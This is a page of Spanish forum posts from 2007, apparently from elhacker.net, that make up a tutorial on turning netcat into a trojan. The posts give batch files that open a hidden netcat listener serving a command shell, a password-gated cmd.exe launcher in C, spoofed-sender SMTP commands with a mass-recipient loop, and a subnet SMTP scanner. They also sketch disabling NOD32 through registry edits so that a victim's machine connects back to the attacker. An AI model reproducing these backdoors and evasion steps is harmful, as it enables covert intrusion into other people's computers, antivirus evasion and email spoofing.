elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 ... 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 [445] 446
4441  Foros Generales / Sugerencias y dudas sobre el Foro / Carita nueva en: 28 Marzo 2007, 22:18 pm
Propongo poner una carita al "XD"

Att. Yan.
Unilola Software. XD
4442  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 28 Marzo 2007, 21:34 pm
Listo. El problema de las imagenes ya fue resuelto :D no me pregunten como lo hice porque pasé un mal rato haciendo 25 hostings para que asi no se caiga ninguna XD.

Agregué el Res Hack para que descarguen desde la pagina de siempre: http://whk.sitehacking.net/

Att. Yan.
Unilola Software.
4443  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 28 Marzo 2007, 19:27 pm
Jers_Tc ... también incluiré el mini remailer server para que puedas practicar ;) solo verifica muy bien la existencia de algun coratuegos tuyo que pueda blokearlo, recuerda que algunos antivirus vienen con un cortafuegos personal Aunque algunos ni saben que lo tienen :p

Miniremailer: http://whk.sitehacking.net/
En la sección de descargas.

Att. Yan
Unilola Software.
4444  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 27 Marzo 2007, 23:05 pm
Consulté a mi querido y buen amigo "sangoogle" y me dijo que el error "h_errno 11001: HOST_NOT_FOUND" se debia a que es una version que utiliza el winsock.h mal compilado por lo cual no trabaja bien.. intenta con el mio, lo añadiré a la pagina:

http://whk.sitehacking.net/
En la sección de descargas.

y una última cosa: han visitado mucho este post por lo cual geocities no ha resistido y se blokeó temporalmente las descargas incluyendo las imagenes asi que tendré que buscar otro lado para cambiar de lugar las imagenes... paciencia.
Att Yan.
Unilola Software.
4445  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 27 Marzo 2007, 22:13 pm
Hecho!. los videos estan acá:

http://whk.h4ck1ng.net/
En la sección de descargas.

también puse los links debjo de cada post original para que asi nadie diga despues: "Donde estan los videos??? no los veo."
4446  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 27 Marzo 2007, 21:27 pm
No sabia que el antivirus lo detectaba :p, al principio pensaba que podría ser el cortafuegos que trae simantec o norton que hace que te rechaze la coneción ya que para poder escuchar con el cliente Debes ponerte de servidor(creo que asi es en el caso del que no le funciona lo del mail) si es asi solo hay que desactivar el cortafuegos ya que lo hice en conexión inversa porque asi tu tienes que ponerte de servidor y puedes manejar a tu modo el cortafuegos, no asi la victima que solo realizará una conexión al puerto 80 (hablo de la parte n1)
Mi consejo es que se fijen muy bien en el cortafuegos y si es asi entonces no habría problema con la victima.
Quedé impresionado al escuchar que nod toma al nc como troyano ya que se supone que nc es una herramienta GNU (unix/liunux) y no un troyano.. ahora, que lo usemos como troyano es otro cuento XD.
si quieren puedo enseñarles a neutralizar el nod32 pero la victima sospecharía ya que esto asecinaría el proceso de nod.

la idea es con un bat hacer un "reg delete" y un "reg add" que elimine el arranque del nod y ejecute la descompresión despues. ponerle winrar en modo consola junto a la carnada cifrada con una contraseña y de esta forma podría pasar... no tengo NOD32 porque la verdad no uso antivirus XD solo cortafuegos y otras cosas pero lo instalaré para estudiarlo mejor y hacer un nuevo pack. Incluiré archivos *.js que se ejecutarán en caso de no tener instalado el dream weaver... de esta forma se ejecutan los scripts sin tantos pestañazos del DOS. Ademas hice este manual solo para explicar algo básico con una buena base para que ustedes puedan modificarlo a su gusto porque si nos vamos a complicr la vida mejor cremos un progrma compilado en c que detenga el proceso de algunos antivirus sin que se vea nada añadiendo un icono y un proceso falso al original (como el degoyador 3.2 que hice hace algun tiempo) y que ñada registros para que no pueda restaurar sistema, otro para que no aparezca el proceso en el administrador de tareas o hacer correr el netcat como un servicio, etc etc...  pero trataré de hacerlo de la forma mas facil y despues trataré de hacer algo un poco mas complicado... denme un poco de tiempo. Y como veo que no quedó bien claro las imagenes voy a tener que hacer un video tutorial XD no demoro.
4447  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 27 Marzo 2007, 04:13 am
aver... las imagenes son reales y las saque mientras lo creaba y al final si me dió la shell, verifiqué algunas cosas y vi que en la primera imagen dice: "%homepath%\update" y en el texto puse que hay que poner "%homedrive%%homepath%\update" y por eso cuando lo ejecutas talves se te descomprime en otra unidad y no encuentra el archivo... mm que mas puede ser?... si te lo descomprime y ves que se descomprimió bien y da eror al ejecutarlo significa que hiciste algo mal al tratar de cambiar el icono y se transformó en un ejecutable corrupto. recuerda que entre "%homedrive%%homepath%" no hay "\" .. que mas puede ser,... ps no se... a mi si me resulta.. si alguien mas tiene el mismo problema porfavor lo diga :-s
Yo lo probé en el XP pero en los demas windows tambien usan path a menos que sea un win 95 o algo asi Aunque no creo XD
4448  Seguridad Informática / Hacking Ético / Re: [HackXCrackPack] Revistas + Foro + Programas + Practicas + Charlas TCP-IP en: 25 Marzo 2007, 17:08 pm
Una pregunta... y que hace Vic_tor hoy en dia??? también desapareció junto con el foro?
4449  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 25 Marzo 2007, 06:32 am
JUGANDO CON NETCAT V1.1
              Parte III



PONIENDO UNA CONTRASEÑA A TUS SHELLS

Ahora les demostraré que no es necesario saber programar en C para crear un dispositivo que nos permita entrar en una shell a través de una contraseña.

Lo primero es abrir el block de notas y escribimos lo siguiente:

@echo off
if not exist ips.txt (goto 1) else goto 2

:1
Echo ips.txt no existe :(
Echo.
pause
exit

:2
for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Ahora me diras.. que es esto?!.. tranquilo, después lo explico XD. Ahora crea otro texto llamado “Iniciar servidor.bat” con el siguiente contenido:

start nc -L -d -e index.bat -p 5051

También lo explicaré después… ahora crea otro texto llamado “Detener servidor.bat” con el siguiente contenido:

tskill nc

Luego crea un texto llamado ips.txt y dentro del texto le escribes tu ip y las ip que tu quieres que tengan acceso a esa shell, y por último pon el netcat junto con todo esto en una carpeta guardada por ahí talves en system32 o donde tu quieras pero todo debe estar en el mismo lugar a menos que quieras modificar el codigo fuente del bat.
Es hora de dar las explicaciones:

Al abrir el bat llamado “iniciar servidor.bat” ejecutaras el netcat y lo dejaras a escucha de otro bat llamado “index.bat” en el puerto 5051 (a elección), luego si alguien se conecta a tu shell se iniciará netcat y comenzará a leer los comandos del bat y resolverá lo siguiente:

if not exist ips.txt (goto 1) else goto 2
:1
Echo pass.txt no existe :(
Echo.
pause
exit


Esto significa que si no existe el archivo con las IP, entonces solo se cierra botándote de la shell, si existe entonces procede a hacer el chequeo:

for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Nos fijaremos principalmente en la primera línea de esta frase y analizaremos que %%i se transforma en las ip puestas en el texto llamado “ips.txt” y ejecuta: netstat -n|find "%%i" && CMD lo cual significa que hace un netstat –n mostrando todas las ip conectadas a ti (incluyendo el que está pidiendo la shell) y al mismo tiempo el comando find busca entre todas esas IPs que estan conectadas si coincide alguna con la ip señalada en el texto y si esta aparece ejecuta CMD y si no aparece te bota de la shell :P (Por eso es recomendable no poner mas que solo tu ip dentro de ese texto porque si hay un usuario logueado entonces todos los demas tendran acceso libre sin autentificación. Y ojala no sea 127.0.0.1 ni tu ip externa porque puede prestarse para confusiones y no servirá de nada todo esto.)
El comando tskill nc significa que mata el proceso llamado nc (el comando tskill viene con todos los Sistemas Operativos NT desde Windows Xp con SP2 en adelante o puedes reemplazarlo por otros comandos que destruyan el proceso)

Como puedes ver no fue necesario saber programar en C para ponerle un acceso seguro a tu shell y que nadie mas te la quite. Esto puede ser muy útiles para administradores de pequeñas redes que quieren tener acceso a ciertos puntos de redes desde el servidor o para que nadie mas se meta en la PC de tu novia mas que tu XD.


PARA PROGRAMADORES

Para los programadores en C puedes probar con una sentencia if donde if pass=[loquequieras] un ejemplo:

#include <stdio.h>
#include <stdlib.h>
main()
{
int usuario,clave=84262;
printf("Introduce la contraseña: ");
scanf("%d",&usuario);
if(usuario==clave)
printf("Acceso concedido!.\n\n");
else
exit (1);
system("cmd.exe");
exit (0);
}


Esto se me ocurrió en mis ratos de ocio XD, cuando lo abres te pide una contraseña y si es la escrita en el codigo fuente, ps te da la shell y si no te da una salida limpia.

Listo amigos… hasta aca llego por ahora.. ya es tarde y otro dia continuo… a grandes rasgos quise demostrar que no se necesita ser programador en C o ingeniero en programación para poder ponerle una pequeña contraseña automatica por asi decirlo :p tambien puedes reemplazar las ip por dominios DNS y reemplazar el comando netstat –n por netstat solamente. Tambien puedes hacer cosas mucho mas eficientes y complejas pero la idea es que por ahora todos sin importar sus conocimientos puedan hacer esto.

Descargar en formato PDF
Ver video explicativo

Att. Yan
Unilola Software.
4450  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 25 Marzo 2007, 05:32 am
JUGANDO CON NETCAT V1.1
                Parte II



TRANSFORMANDO NETCAT EN UN CLIENTE SMTP Y FTP

Bueno… ahora les mostraré que no es necesario usar el bombermail, el feeboti, xmass o cualquier pendejada para enviar un correo sin tener que usar telnet. Claro está que hay programas que tienen muchas funciones como libreta de direcciones, escaneadotes de servidores SMTP, comprobación de usuarios y otras cosas que nos hacen todo ya automatizado en una linda ventanita grafica pequeña o tremendas presentaciones flash como el bomber de dragon XD, pero todo lo que pueden hacer estos programas… también puede hacerlo tu Netcat v1.1.

Materiales:
Netcat v1.1
Un editor de texto (el block de notas es ideal)


Si se han fijado… enviar un mail desde una consola NT no es muy fácil porque no viene por defecto algun programa que lo haga como el comando mail de GNU, pero si obtenemos una shell remota sobre una pc con netcat… puedes usar el mismo para enviar correos, archivos y lo que se te de la gana.

Creamos un texto con el block de notas que contenga lo siguiente:

helo queteimporta@yahoo.com
mail from: yan@anonimo.com
rcpt to: yan_uniko_102@yahoo.com.mx
data
From: yan@anonimo.com
To: yan_uniko_102@yahoo.com.mx
Subject: Provando netcat

Este es mi primer mensaje enviado con netcat
.


Bueno y que es esto en resumidas palabras?:
Helo      = nos identificamos
mail from   = correo proveniente
rcpt to      = correo destino
data      = el mensaje en si.

Dentro del mensaje decimos que el correo proviene desde  yan@anonimo.com para yan_uniko_102@yahoo.com.mx con el sujeto: probando netcat y con el mensaje: “Este es mi primer mensaje enviado con netcat”. Ahora fíjense de dos detalles muy importantes. Uno es el espacio en blanco entre la cabecera del mensaje y el mensaje en si (entre “subset” y “este es mi…”) y segundo el punto al final del mensaje.
Lo guardamos como queramos, yo elegí guardarlo como “mensaje.txt” y ejecuté lo siguiente:  type mensaje.txt|nc -vv -w 3 127.0.0.1 25 y me apareció algo como esto:



Puedes ver que todos los comandos que escribimos en el notepad se volcaron al netcat y se realizó la conexión y el envío automatizado. Ahora analicemos el comando un poco.

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

type mensaje.txt   = decimos que se vuelque el contenido de mensaje.txt en pantalla
|         = decimos que al mismo tiempo ejecute el siguiente comando
nc -vv -w 3 127.0.0.1 25 = decimos que netcat se conecte al host 127.0.0.1 (servidor SMTP) hacia el puerto 25… -w 3 significa que espere tres segundos antes de enviar el correo para darle tiempo al servidor de reaccionar… -vv (Very Verbose) significa que te muestre lo que se está haciendo.

Podemos utilizar comandos como –attach para enviar archivos adjuntos o crear nuestras propias planillas en texto y con un simple bat… enviarlos a distintos destinatarios… podemos jugar mucho con este codigo hasta hacer un enorme bat que recoja el mismo mensaje para diferentes destinatarios dentro de un texto guardado llamado user a través del comando “for”. (el spam es delito XD ). Una buena ventaja de todo esto es que puedes hacer el texto con el comando echo de la siguiente manera:

Echo helo queteimporta@yahoo.com > mensaje.txt
Echo mail from: yan@anonimo.com >> mensaje.txt
Echo rcpt to: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo data  >> mensaje.txt
Echo From: yan@anonimo.com >> mensaje.txt
Echo To: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo Subject: Provando netcat >> mensaje.txt
Echo. >> mensaje.txt
Echo Este es mi primer mensaje enviado con netcat >> mensaje.txt
Echo . >> mensaje.txt


O puedes usar el comando for de la siguiente manera:

for /f %%i in (direcciones.txt) do Echo rcpt to: %%i >> mensaje.txt

y ufff  puedes hacer mil cosas como hasta escanear servidores SMTP con netcat hacienda un:

for /l %%i in (1,1,254) do if errorlevel = 0 nc 1 192.168.1.%%i 25|find "smtp" && echo 192.168.1.%%i >>escaner.txt

y los que estén dentro del rango de IPs seleccionadas y que respondan al puerto 25 con un barrer SMTP se escribirá su IP dentro de un texto llamado scanner.txt… también puedes usar el comando for para volcar textos con un listado amplio de IPs creados talvez por el dictmake.exe o el brainscan.exe o con otro bat XD.

Yo puse 127.0.0.1 de servidor en el primer ejemplo porque yo mismo utilicé un minirelay para poder enviar el correo ya que me dio flojera buscar un servidor para probar :p



Y al revisar el correo me encontré con mi netcat :D



Ahora esto también sirve para automatizar subidas y descargas de archivos a un ftp con tu netcat y decir por ejemplo que cada una hora me respalde mis archivos en mi ftp pero que primero borre los antiguos, en resumidas palabras seria algo así:

type comando.txt|nc -vv -w 3 127.0.0.1 21

y el commando.txt diría algo así:

user usuario
pass password
dele respaldo.rar
etc etc etc y al final quit


y veras como el netcat entra a tu ftp, borra el respaldo y coloca el nuevo. Para poder temporizar esto puedes usar un comando muy facil que me enseñó un muy buen amigo mío (Octhal):

ping 127.0.0.1 -n 2  >nul

Esto equivale a un segundo… o sea para que esto se transforme en una hora quedaría así:

ping 127.0.0.1 -n 7200  >nul

Con todo esto tu bat debería quedar así:

@Echo off
Cls
:1
Echo Ultima actualizacion: %time% %date%
type comando.txt|nc -vv -w 3 127.0.0.1 21
ping 127.0.0.1 -n 7200  >nul
goto 1


Decimos que respalde nuestros archivos y que después de una hora se haga un goto para hacer un loop. También puedes usar esto para subir archivos desde una PC tomada con tu shell y ponerles, obviamente tu como servidor.

Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación ;)
La próxima vez les enseñaré como ponerle contraseña a netcat para que nadie usurpe tus shells con o sin conocimientos de programación.
Hasta la prox.

Descargar en PDF
Ver video explicativo

Att. Yan
Unilola Software
Páginas: 1 ... 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 [445] 446
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines